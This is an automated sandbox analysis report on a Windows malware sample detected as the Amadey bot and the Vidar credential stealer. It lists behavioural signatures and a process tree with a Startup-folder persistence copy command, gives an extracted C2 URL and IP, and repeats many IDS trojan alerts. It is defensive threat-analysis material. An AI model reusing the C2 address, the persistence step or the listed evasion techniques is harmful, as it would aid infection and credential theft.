Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0XzeMRyE1e.exe

Overview

General Information

Sample Name:0XzeMRyE1e.exe
Analysis ID:637914
MD5:4a2ac1e629644be2b37f29f21998c8d3
SHA1:a11cf92600e88810af392d2514795c165bcea940
SHA256:7cb09dd4d3a661362b75ea236711ab5601f636edb0d2c647fa8f18e190678b1d
Tags:Amadeyexe
Infos:

Detection

Amadey, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Amadeys stealer DLL
Yara detected Amadey bot
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Vidar stealer
Multi AV Scanner detection for dropped file
Found evasive API chain (may stop execution after checking mutex)
Drops PE files to the startup folder
Found stalling execution ending in API Sleep call
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • 0XzeMRyE1e.exe (PID: 3220 cmdline: "C:\Users\user\Desktop\0XzeMRyE1e.exe" MD5: 4A2AC1E629644BE2B37F29F21998C8D3)
    • cmd.exe (PID: 4832 cmdline: C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\0XzeMRyE1e.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • 0XzeMRyE1e.exe (PID: 1284 cmdline: C:\Users\user\Desktop\0XzeMRyE1e.exe MD5: 4A2AC1E629644BE2B37F29F21998C8D3)
      • file_22613.exe (PID: 6624 cmdline: "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe" MD5: FE87E3591C90ECCD54C558FB487E262E)
  • 0XzeMRyE1e.exe (PID: 6456 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe" MD5: 4A2AC1E629644BE2B37F29F21998C8D3)
    • 0XzeMRyE1e.exe (PID: 6984 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe MD5: 4A2AC1E629644BE2B37F29F21998C8D3)
  • file_22613.exe (PID: 6756 cmdline: "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe" MD5: FE87E3591C90ECCD54C558FB487E262E)
  • file_22613.exe (PID: 6824 cmdline: "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe" MD5: FE87E3591C90ECCD54C558FB487E262E)
  • cleanup
{"C2 url": "sigint.ws/f8dfksdj3/index.php", "Version": "3.10"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000D.00000000.298445162.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000015.00000000.410768530.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000000.00000002.304714151.00000000038E3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 31 entries
              SourceRuleDescriptionAuthorStrings
              13.0.0XzeMRyE1e.exe.400000.10.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                16.2.0XzeMRyE1e.exe.37e2e08.5.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  21.0.0XzeMRyE1e.exe.400000.6.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    13.2.0XzeMRyE1e.exe.400000.0.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      21.0.0XzeMRyE1e.exe.400000.16.raw.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        Click to see the 57 entries
                        No Sigma rule has matched
                        Timestamp:192.168.2.480.66.64.10349930802027700 06/02/22-01:55:16.173253
                        SID:2027700
                        Source Port:49930
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349838802027700 06/02/22-01:54:35.308940
                        SID:2027700
                        Source Port:49838
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349927802027700 06/02/22-01:55:14.996723
                        SID:2027700
                        Source Port:49927
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349795802027700 06/02/22-01:54:03.603999
                        SID:2027700
                        Source Port:49795
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349847802027700 06/02/22-01:54:40.420240
                        SID:2027700
                        Source Port:49847
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349884802027700 06/02/22-01:54:59.033835
                        SID:2027700
                        Source Port:49884
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349786802027700 06/02/22-01:53:59.792799
                        SID:2027700
                        Source Port:49786
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349856802027700 06/02/22-01:54:48.512198
                        SID:2027700
                        Source Port:49856
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349865802027700 06/02/22-01:54:52.313960
                        SID:2027700
                        Source Port:49865
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349804802027700 06/02/22-01:54:11.691876
                        SID:2027700
                        Source Port:49804
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349875802027700 06/02/22-01:54:56.892898
                        SID:2027700
                        Source Port:49875
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349908802027700 06/02/22-01:55:09.504161
                        SID:2027700
                        Source Port:49908
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349860802027700 06/02/22-01:54:50.236611
                        SID:2027700
                        Source Port:49860
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349902802027700 06/02/22-01:55:07.107382
                        SID:2027700
                        Source Port:49902
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349813802027700 06/02/22-01:54:16.846546
                        SID:2027700
                        Source Port:49813
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349911802027700 06/02/22-01:55:10.674378
                        SID:2027700
                        Source Port:49911
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349857802027700 06/02/22-01:54:48.921276
                        SID:2027700
                        Source Port:49857
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349822802027700 06/02/22-01:54:22.723931
                        SID:2027700
                        Source Port:49822
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349794802027700 06/02/22-01:54:03.209829
                        SID:2027700
                        Source Port:49794
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349898802027700 06/02/22-01:55:05.537740
                        SID:2027700
                        Source Port:49898
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349842802027700 06/02/22-01:54:37.470332
                        SID:2027700
                        Source Port:49842
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349805802027700 06/02/22-01:54:12.457300
                        SID:2027700
                        Source Port:49805
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349917802027700 06/02/22-01:55:13.026841
                        SID:2027700
                        Source Port:49917
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349828802027700 06/02/22-01:54:29.678179
                        SID:2027700
                        Source Port:49828
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349912802027700 06/02/22-01:55:11.068306
                        SID:2027700
                        Source Port:49912
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349894802027700 06/02/22-01:55:03.266530
                        SID:2027700
                        Source Port:49894
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349846802027700 06/02/22-01:54:39.535862
                        SID:2027700
                        Source Port:49846
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349918802027700 06/02/22-01:55:13.415553
                        SID:2027700
                        Source Port:49918
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349823802027700 06/02/22-01:54:23.851395
                        SID:2027700
                        Source Port:49823
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349829802027700 06/02/22-01:54:30.271644
                        SID:2027700
                        Source Port:49829
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349787802027700 06/02/22-01:54:00.206557
                        SID:2027700
                        Source Port:49787
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349899802027700 06/02/22-01:55:05.935550
                        SID:2027700
                        Source Port:49899
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349841802027700 06/02/22-01:54:36.841594
                        SID:2027700
                        Source Port:49841
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349907802027700 06/02/22-01:55:09.093756
                        SID:2027700
                        Source Port:49907
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349809802027700 06/02/22-01:54:14.556780
                        SID:2027700
                        Source Port:49809
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349873802027700 06/02/22-01:54:56.035907
                        SID:2027700
                        Source Port:49873
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349876802027700 06/02/22-01:54:57.279397
                        SID:2027700
                        Source Port:49876
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349904802027700 06/02/22-01:55:07.924426
                        SID:2027700
                        Source Port:49904
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349818802027700 06/02/22-01:54:20.253472
                        SID:2027700
                        Source Port:49818
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349864802027700 06/02/22-01:54:51.906731
                        SID:2027700
                        Source Port:49864
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349870802027700 06/02/22-01:54:54.611013
                        SID:2027700
                        Source Port:49870
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349910802027700 06/02/22-01:55:10.281176
                        SID:2027700
                        Source Port:49910
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349821802027700 06/02/22-01:54:22.195678
                        SID:2027700
                        Source Port:49821
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349815802027700 06/02/22-01:54:18.395076
                        SID:2027700
                        Source Port:49815
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349824802027700 06/02/22-01:54:26.976249
                        SID:2027700
                        Source Port:49824
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349913802027700 06/02/22-01:55:11.452857
                        SID:2027700
                        Source Port:49913
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349840802027700 06/02/22-01:54:36.304157
                        SID:2027700
                        Source Port:49840
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349845802027700 06/02/22-01:54:39.016305
                        SID:2027700
                        Source Port:49845
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349848802027700 06/02/22-01:54:40.940110
                        SID:2027700
                        Source Port:49848
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349797802027700 06/02/22-01:54:07.717713
                        SID:2027700
                        Source Port:49797
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349839802027700 06/02/22-01:54:35.815421
                        SID:2027700
                        Source Port:49839
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349895802027700 06/02/22-01:55:03.704177
                        SID:2027700
                        Source Port:49895
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349928802027700 06/02/22-01:55:15.391348
                        SID:2027700
                        Source Port:49928
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349854802027700 06/02/22-01:54:47.429553
                        SID:2027700
                        Source Port:49854
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349889802027700 06/02/22-01:55:00.995564
                        SID:2027700
                        Source Port:49889
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349851802027700 06/02/22-01:54:43.268560
                        SID:2027700
                        Source Port:49851
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349886802027700 06/02/22-01:54:59.808425
                        SID:2027700
                        Source Port:49886
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349892802027700 06/02/22-01:55:02.407884
                        SID:2027700
                        Source Port:49892
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349802802027700 06/02/22-01:54:10.716390
                        SID:2027700
                        Source Port:49802
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349837802027700 06/02/22-01:54:34.756140
                        SID:2027700
                        Source Port:49837
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349843802027700 06/02/22-01:54:37.930780
                        SID:2027700
                        Source Port:49843
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349915802027700 06/02/22-01:55:12.229808
                        SID:2027700
                        Source Port:49915
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349878802027700 06/02/22-01:54:57.842866
                        SID:2027700
                        Source Port:49878
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349790802027700 06/02/22-01:54:01.502536
                        SID:2027700
                        Source Port:49790
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349862802027700 06/02/22-01:54:51.108372
                        SID:2027700
                        Source Port:49862
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349789802027700 06/02/22-01:54:01.077017
                        SID:2027700
                        Source Port:49789
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349832802027700 06/02/22-01:54:31.829694
                        SID:2027700
                        Source Port:49832
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349867802027700 06/02/22-01:54:53.090905
                        SID:2027700
                        Source Port:49867
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349909802027700 06/02/22-01:55:09.894069
                        SID:2027700
                        Source Port:49909
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349826802027700 06/02/22-01:54:28.377083
                        SID:2027700
                        Source Port:49826
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349784802027700 06/02/22-01:53:58.905731
                        SID:2027700
                        Source Port:49784
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349896802027700 06/02/22-01:55:05.115552
                        SID:2027700
                        Source Port:49896
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349844802027700 06/02/22-01:54:38.495305
                        SID:2027700
                        Source Port:49844
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349798802027700 06/02/22-01:54:08.357862
                        SID:2027700
                        Source Port:49798
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349792802027700 06/02/22-01:54:02.409046
                        SID:2027700
                        Source Port:49792
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349890802027700 06/02/22-01:55:01.415532
                        SID:2027700
                        Source Port:49890
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349820802027700 06/02/22-01:54:21.626939
                        SID:2027700
                        Source Port:49820
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349801802027700 06/02/22-01:54:10.166147
                        SID:2027700
                        Source Port:49801
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349807802027700 06/02/22-01:54:13.581561
                        SID:2027700
                        Source Port:49807
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349881802027700 06/02/22-01:54:58.640328
                        SID:2027700
                        Source Port:49881
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349859802027700 06/02/22-01:54:49.805320
                        SID:2027700
                        Source Port:49859
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349872802027700 06/02/22-01:54:55.595480
                        SID:2027700
                        Source Port:49872
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349868802027700 06/02/22-01:54:53.522171
                        SID:2027700
                        Source Port:49868
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349810802027700 06/02/22-01:54:15.300527
                        SID:2027700
                        Source Port:49810
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349816802027700 06/02/22-01:54:18.919405
                        SID:2027700
                        Source Port:49816
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349863802027700 06/02/22-01:54:51.496357
                        SID:2027700
                        Source Port:49863
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349905802027700 06/02/22-01:55:08.307583
                        SID:2027700
                        Source Port:49905
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349788802027700 06/02/22-01:54:00.640844
                        SID:2027700
                        Source Port:49788
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349929802027700 06/02/22-01:55:15.780137
                        SID:2027700
                        Source Port:49929
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349871802027700 06/02/22-01:54:55.173382
                        SID:2027700
                        Source Port:49871
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349900802027700 06/02/22-01:55:06.323240
                        SID:2027700
                        Source Port:49900
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349834802027700 06/02/22-01:54:32.993751
                        SID:2027700
                        Source Port:49834
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349811802027700 06/02/22-01:54:15.765338
                        SID:2027700
                        Source Port:49811
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349869802027700 06/02/22-01:54:54.121449
                        SID:2027700
                        Source Port:49869
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349817802027700 06/02/22-01:54:19.458105
                        SID:2027700
                        Source Port:49817
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349830802027700 06/02/22-01:54:30.708454
                        SID:2027700
                        Source Port:49830
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349764802027700 06/02/22-01:53:40.683010
                        SID:2027700
                        Source Port:49764
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349793802027700 06/02/22-01:54:02.814058
                        SID:2027700
                        Source Port:49793
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349887802027700 06/02/22-01:55:00.209740
                        SID:2027700
                        Source Port:49887
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:80.66.64.103192.168.2.480497642838063 06/02/22-01:53:40.865782
                        SID:2838063
                        Source Port:80
                        Destination Port:49764
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349853802027700 06/02/22-01:54:46.902584
                        SID:2027700
                        Source Port:49853
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349906802027700 06/02/22-01:55:08.703562
                        SID:2027700
                        Source Port:49906
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349800802027700 06/02/22-01:54:09.502750
                        SID:2027700
                        Source Port:49800
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349835802027700 06/02/22-01:54:33.554231
                        SID:2027700
                        Source Port:49835
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349858802027700 06/02/22-01:54:49.360293
                        SID:2027700
                        Source Port:49858
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349901802027700 06/02/22-01:55:06.719832
                        SID:2027700
                        Source Port:49901
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349806802027700 06/02/22-01:54:12.991151
                        SID:2027700
                        Source Port:49806
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349803802027700 06/02/22-01:54:11.166089
                        SID:2027700
                        Source Port:49803
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349812802027700 06/02/22-01:54:16.364540
                        SID:2027700
                        Source Port:49812
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349916802027700 06/02/22-01:55:12.621332
                        SID:2027700
                        Source Port:49916
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349861802027700 06/02/22-01:54:50.675680
                        SID:2027700
                        Source Port:49861
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349852802027700 06/02/22-01:54:46.408172
                        SID:2027700
                        Source Port:49852
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349888802027700 06/02/22-01:55:00.609327
                        SID:2027700
                        Source Port:49888
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349922802027700 06/02/22-01:55:14.194314
                        SID:2027700
                        Source Port:49922
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349799802027700 06/02/22-01:54:08.864611
                        SID:2027700
                        Source Port:49799
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349836802027700 06/02/22-01:54:34.112033
                        SID:2027700
                        Source Port:49836
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349833802027700 06/02/22-01:54:32.459145
                        SID:2027700
                        Source Port:49833
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349827802027700 06/02/22-01:54:28.893296
                        SID:2027700
                        Source Port:49827
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349925802027700 06/02/22-01:55:14.580879
                        SID:2027700
                        Source Port:49925
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:192.168.2.480.66.64.10349831802027700 06/02/22-01:54:31.147059
                        SID:2027700
